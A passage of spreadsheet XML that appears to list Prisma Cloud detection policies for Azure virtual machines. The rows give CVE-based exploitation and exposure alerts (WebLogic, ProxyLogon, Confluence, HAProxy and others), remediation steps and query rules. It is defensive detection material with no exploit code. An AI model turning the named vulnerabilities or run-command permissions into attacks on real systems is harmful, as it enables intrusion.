          <t>d360f387-470d-4fab-b924-dc5c3bab7391</t>
        </is>
      </c>
      <c r="AJ2527" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2527" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2528">
      <c r="A2528" t="inlineStr"/>
      <c r="B2528" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2528" s="2" t="inlineStr"/>
      <c r="D2528" t="inlineStr"/>
      <c r="E2528" t="inlineStr"/>
      <c r="F2528" t="inlineStr"/>
      <c r="G2528" t="b">
        <v>1</v>
      </c>
      <c r="H25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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2528" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2528" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [Nginx PHP-FPM, CVE-2019-11043]</t>
        </is>
      </c>
      <c r="L2528" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2528" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2528" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2528" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2528" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2528" t="inlineStr"/>
      <c r="R2528" t="inlineStr"/>
      <c r="S2528" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2528" t="b">
        <v>0</v>
      </c>
      <c r="U2528" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2528" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2528" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to remote code execution (RCE) with exploits in the wild [Nginx PHP-FPM, CVE-2019-11043]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of Nginx PHP-FPM software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Nginx PHP-FPM [CVE-2019-11043] vulnerability reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X252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CVE-2019-11043
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2019-11043</t>
        </is>
      </c>
      <c r="Y2528" t="inlineStr"/>
      <c r="Z2528" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2019-11043 - Nginx PHP-FPM Remote Code Execution) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2019-11043'))</t>
        </is>
      </c>
      <c r="AA2528" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2528" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:46</t>
        </is>
      </c>
      <c r="AC2528" t="inlineStr"/>
      <c r="AD2528" t="b">
        <v>1</v>
      </c>
      <c r="AE2528" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2528" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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8" t="inlineStr">
        <is>
          <t>5c7bbc6e-ec12-43ad-8800-55ce1dc143f5</t>
        </is>
      </c>
      <c r="AI2528" t="inlineStr">
        <is>
          <t>72dc0e90-ca0e-4044-a5a6-0610c8fbba51</t>
        </is>
      </c>
      <c r="AJ2528" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2528" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2529">
      <c r="A2529" t="inlineStr"/>
      <c r="B2529" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2529" s="2" t="inlineStr"/>
      <c r="D2529" t="inlineStr"/>
      <c r="E2529" t="inlineStr"/>
      <c r="F2529" t="inlineStr"/>
      <c r="G2529" t="b">
        <v>1</v>
      </c>
      <c r="H25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29" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2529" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2529" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [WebLogic, CVE-2019-2725, CVE-2019-2729]</t>
        </is>
      </c>
      <c r="L2529" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2529" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2529" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2529" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2529" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2529" t="inlineStr"/>
      <c r="R2529" t="inlineStr"/>
      <c r="S2529" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2529" t="b">
        <v>0</v>
      </c>
      <c r="U2529" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2529" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2529" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to remote code execution (RCE) with exploits in the wild [WebLogic, CVE-2019-2725, CVE-2019-2729].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerabilities on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of WebLogic software installed makes it an easy target for an attacker to exploit these vulnerabilities.
Immediate attention is required to remediate the WebLogic [CVE-2019-2725, CVE-2019-2729] vulnerabilities reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X252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CVE-2019-2725
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2019-2725
   https://nvd.nist.gov/vuln/detail/CVE-2019-2729</t>
        </is>
      </c>
      <c r="Y2529" t="inlineStr"/>
      <c r="Z2529" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2019-2725, CVE-2019-2729 - WebLogic) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2019-2725', 'CVE-2019-2729'))</t>
        </is>
      </c>
      <c r="AA2529" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2529" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:48</t>
        </is>
      </c>
      <c r="AC2529" t="inlineStr"/>
      <c r="AD2529" t="b">
        <v>1</v>
      </c>
      <c r="AE2529" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2529" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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29" t="inlineStr">
        <is>
          <t>4b7495b5-444b-45c3-8493-1ac36b5b4a92</t>
        </is>
      </c>
      <c r="AI2529" t="inlineStr">
        <is>
          <t>66078e3d-e07e-4c76-8b01-ce811ba20456</t>
        </is>
      </c>
      <c r="AJ2529" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2529" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2530">
      <c r="A2530" t="inlineStr"/>
      <c r="B2530" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2530" s="2" t="inlineStr"/>
      <c r="D2530" t="inlineStr"/>
      <c r="E2530" t="inlineStr"/>
      <c r="F2530" t="inlineStr"/>
      <c r="G2530" t="b">
        <v>1</v>
      </c>
      <c r="H25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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2530" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2530" t="inlineStr">
        <is>
          <t>Server Side Request Forgery (SSRF) risk due to publicly exposed and vulnerable Azure Virtual Machine [Node.js, CVE-2020-28168]</t>
        </is>
      </c>
      <c r="L2530" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2530" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2530" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2530" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2530" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2530" t="inlineStr"/>
      <c r="R2530" t="inlineStr"/>
      <c r="S2530" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2530" t="b">
        <v>0</v>
      </c>
      <c r="U2530" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2530" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2530" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have known exploitable server side request forgery vulnerability [Node.js, CVE-2020-28168].
Server side request forgery vulnerability is a security flaw that allows an attacker to force a server to make unintended requests. Exploiting this vulnerability compromises data confidentiality and can lead to unauthorized actions. The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to exploit the affected system.
Immediate attention is required to remediate the Node.js [CVE-2020-28168] vulnerability and public exposure reported for the Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X253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2530" t="inlineStr"/>
      <c r="Z2530" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2020-28168'))</t>
        </is>
      </c>
      <c r="AA2530" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2530" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:53</t>
        </is>
      </c>
      <c r="AC2530" t="inlineStr"/>
      <c r="AD2530" t="b">
        <v>1</v>
      </c>
      <c r="AE2530" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2530" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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0" t="inlineStr">
        <is>
          <t>a0bef637-2711-481f-8caf-bce1638a0007</t>
        </is>
      </c>
      <c r="AI2530" t="inlineStr">
        <is>
          <t>6d84ac9d-9f26-4b36-8bec-723f623a17c8</t>
        </is>
      </c>
      <c r="AJ2530" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2530" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2531">
      <c r="A2531" t="inlineStr"/>
      <c r="B2531" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2531" s="2" t="inlineStr"/>
      <c r="D2531" t="inlineStr"/>
      <c r="E2531" t="inlineStr"/>
      <c r="F2531" t="inlineStr"/>
      <c r="G2531" t="b">
        <v>1</v>
      </c>
      <c r="H25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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2531" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2531" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [Apache Spark, CVE-2022-33891]</t>
        </is>
      </c>
      <c r="L2531" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2531" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2531" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2531" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2531" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2531" t="inlineStr"/>
      <c r="R2531" t="inlineStr"/>
      <c r="S2531" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2531" t="b">
        <v>0</v>
      </c>
      <c r="U2531" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2531" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2531" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to Remote Code Execution (RCE) with exploits in the wild[Apache Spark, CVE-2022-33891].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of Apache Spark software installed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the Apache Spark RCE [CVE-2022-33891] vulnerability reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X253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2531" t="inlineStr"/>
      <c r="Z2531" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-33891 - Apache Spark RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-33891'))</t>
        </is>
      </c>
      <c r="AA2531" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2531" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:43</t>
        </is>
      </c>
      <c r="AC2531" t="inlineStr"/>
      <c r="AD2531" t="b">
        <v>1</v>
      </c>
      <c r="AE2531" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2531" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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1" t="inlineStr">
        <is>
          <t>366d6ddd-faff-4ca4-9fe8-6b22afbd54df</t>
        </is>
      </c>
      <c r="AI2531" t="inlineStr">
        <is>
          <t>4ffa1c26-f8e7-4913-8333-e32bdab945bf</t>
        </is>
      </c>
      <c r="AJ2531" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2531" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2532">
      <c r="A2532" t="inlineStr"/>
      <c r="B2532" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2532" s="2" t="inlineStr"/>
      <c r="D2532" t="inlineStr"/>
      <c r="E2532" t="inlineStr"/>
      <c r="F2532" t="inlineStr"/>
      <c r="G2532" t="b">
        <v>1</v>
      </c>
      <c r="H25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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2532" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2532" t="inlineStr">
        <is>
          <t>Authentication bypass exploitation attempt on Azure VM with known exploitable vulnerability (CVE-2023-22515, Confluence)</t>
        </is>
      </c>
      <c r="L2532" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2532" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2532" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2532" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2532" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2532" t="inlineStr"/>
      <c r="R2532" t="inlineStr"/>
      <c r="S2532" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2532" t="b">
        <v>0</v>
      </c>
      <c r="U2532" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2532" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2532" t="inlineStr">
        <is>
          <t>This policy identifies attempts to exploit a known vulnerability (CVE-2023-22515) in applications running on Azure VM resources. The presence of CVE-2023-22515 in the application indicates a critical security risk that could allow attackers to bypass authentication mechanisms, leading to unauthorized access to sensitive data.
Detecting attempts to exploit this vulnerability underscores the urgency of assessing and securing affected applications to prevent successful attacks. The exploitation of CVE-2023-22515 could lead to significant security incidents, including unauthorized access to sensitive data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CVE-2023-22515 vulnerability on affected Azure VM instances.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2532" t="inlineStr">
        <is>
          <t>[Vulnerability]
1. Identify and access the reported resource affected by CVE-2023-22515
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
https://nvd.nist.gov/vuln/detail/CVE-2023-22515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532" t="inlineStr"/>
      <c r="Z2532" t="inlineStr">
        <is>
          <t>asset WHERE asset.type = 'azure-vm-list' and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2023-22515 - Confluence authentication bypass ) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2023-22515'))</t>
        </is>
      </c>
      <c r="AA2532" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2532" t="inlineStr">
        <is>
          <t>2024-05-23 08:56:29</t>
        </is>
      </c>
      <c r="AC2532" t="inlineStr"/>
      <c r="AD2532" t="b">
        <v>1</v>
      </c>
      <c r="AE2532" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2532" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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2" t="inlineStr">
        <is>
          <t>61039133-575e-4394-a741-41f85c16b3c2</t>
        </is>
      </c>
      <c r="AI2532" t="inlineStr">
        <is>
          <t>b12bec9f-b23f-4679-a581-6f64d8f67db1</t>
        </is>
      </c>
      <c r="AJ2532" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2532" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2533">
      <c r="A2533" t="inlineStr"/>
      <c r="B2533" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2533" s="2" t="inlineStr"/>
      <c r="D2533" t="inlineStr"/>
      <c r="E2533" t="inlineStr"/>
      <c r="F2533" t="inlineStr"/>
      <c r="G2533" t="b">
        <v>1</v>
      </c>
      <c r="H25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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2533" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2533" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [ProxyLogon/HAFNIUM Attack Chain, CVE-2021-26858, CVE-2021-27065]</t>
        </is>
      </c>
      <c r="L2533" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2533" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2533" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2533" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2533" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2533" t="inlineStr"/>
      <c r="R2533" t="inlineStr"/>
      <c r="S2533" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2533" t="b">
        <v>0</v>
      </c>
      <c r="U2533" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2533" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2533" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to Remote Code Execution (RCE) with exploits in the wild [ProxyLogon/HAFNIUM Attack Chain, CVE-2021-26858, CVE-2021-27065].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version exposed makes it an easy target for an attacker to exploit these vulnerabilities.
Immediate attention is required to remediate the ProxyLogon/HAFNIUM Attack Chain vulnerabilities [CVE-2021-26858, CVE-2021-27065] reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X253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CVE-2021-26858
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-26858
   https://nvd.nist.gov/vuln/detail/CVE-2021-27065</t>
        </is>
      </c>
      <c r="Y2533" t="inlineStr"/>
      <c r="Z2533" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-26858, CVE-2021-27065 - ProxyLogon/HAFNIUM RCE Attack Chain) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-26858', 'CVE-2021-27065'))</t>
        </is>
      </c>
      <c r="AA2533" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2533" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:45</t>
        </is>
      </c>
      <c r="AC2533" t="inlineStr"/>
      <c r="AD2533" t="b">
        <v>1</v>
      </c>
      <c r="AE2533" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2533" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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3" t="inlineStr">
        <is>
          <t>aaf425a6-3b79-466e-a156-30dc51505cbf</t>
        </is>
      </c>
      <c r="AI2533" t="inlineStr">
        <is>
          <t>d4d888dd-9794-440c-a160-787a4758cab6</t>
        </is>
      </c>
      <c r="AJ2533" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2533" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2534">
      <c r="A2534" t="inlineStr"/>
      <c r="B2534" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2534" s="2" t="inlineStr"/>
      <c r="D2534" t="inlineStr"/>
      <c r="E2534" t="inlineStr"/>
      <c r="F2534" t="inlineStr"/>
      <c r="G2534" t="b">
        <v>1</v>
      </c>
      <c r="H25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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2534" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2534" t="inlineStr">
        <is>
          <t>Brute force attack risk on a publicly exposed Azure Virtual Machine with run command permissions</t>
        </is>
      </c>
      <c r="L2534" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2534" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2534" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2534" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2534" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2534" t="inlineStr"/>
      <c r="R2534" t="inlineStr"/>
      <c r="S2534" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2534" t="b">
        <v>0</v>
      </c>
      <c r="U2534" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2534" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2534" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed, use basic authentication instead of SSH keys, and have run command execution permissions.
Publicly exposed Azure Virtual Machine with basic authentication enables bad actors to use brute force on a system to gain unauthorized access. The Run command execution permissions on the instance further could allow attackers to execute scripts or commands on the virtual machine and could laterally move across cloud accounts.
This policy checks for the following risky permissions:
''Microsoft.Compute/virtualMachines/runCommands/write'', ''Microsoft.Compute/virtualMachines/runCommand/action''
Immediate attention is required to review run command execution permissions and remove them if are not intended, ensure Azure Virtual Machine uses SSH Key authentication instead of basic authentication, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X253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if necessary</t>
        </is>
      </c>
      <c r="Y2534" t="inlineStr"/>
      <c r="Z2534" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure Virtual Machine (Linux) does not authenticate using SSH keys','Azure VM instance with Run command permissions')</t>
        </is>
      </c>
      <c r="AA2534" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2534" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:03</t>
        </is>
      </c>
      <c r="AC2534" t="inlineStr"/>
      <c r="AD2534" t="b">
        <v>1</v>
      </c>
      <c r="AE2534" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2534" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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4" t="inlineStr">
        <is>
          <t>061595d4-e44c-47f7-83a5-01e82affeb12</t>
        </is>
      </c>
      <c r="AI2534" t="inlineStr">
        <is>
          <t>74576071-3070-4d8a-a5a3-7e15bc37b61f</t>
        </is>
      </c>
      <c r="AJ2534" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2534" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2535">
      <c r="A2535" t="inlineStr"/>
      <c r="B2535" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2535" s="2" t="inlineStr"/>
      <c r="D2535" t="inlineStr"/>
      <c r="E2535" t="inlineStr"/>
      <c r="F2535" t="inlineStr"/>
      <c r="G2535" t="b">
        <v>1</v>
      </c>
      <c r="H25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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2535" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2535" t="inlineStr">
        <is>
          <t>HTTP request smuggling risk due to publicly exposed and vulnerable Azure Virtual Machine [HAProxy, CVE-2023-25725]</t>
        </is>
      </c>
      <c r="L2535" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2535" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2535" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2535" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2535" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2535" t="inlineStr"/>
      <c r="R2535" t="inlineStr"/>
      <c r="S2535" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2535" t="b">
        <v>0</v>
      </c>
      <c r="U2535" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2535" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2535" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have known exploitable HTTP request smuggling vulnerability [CVE-2023-25725].
HTTP request smuggling vulnerability can be leveraged by attackers to manipulate or bypass security mechanisms, potentially leading to unauthorized access, data leakage, or other security breaches. The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the HAProxy [CVE-2023-25725] vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X253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CVE-2023-25725
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-25725</t>
        </is>
      </c>
      <c r="Y2535" t="inlineStr"/>
      <c r="Z2535" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-25725'))</t>
        </is>
      </c>
      <c r="AA2535" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2535" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2535" t="inlineStr"/>
      <c r="AD2535" t="b">
        <v>1</v>
      </c>
      <c r="AE2535" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2535" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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5" t="inlineStr">
        <is>
          <t>d5e4ada6-53ab-4f2c-8491-f6e82dbf0a77</t>
        </is>
      </c>
      <c r="AI2535" t="inlineStr">
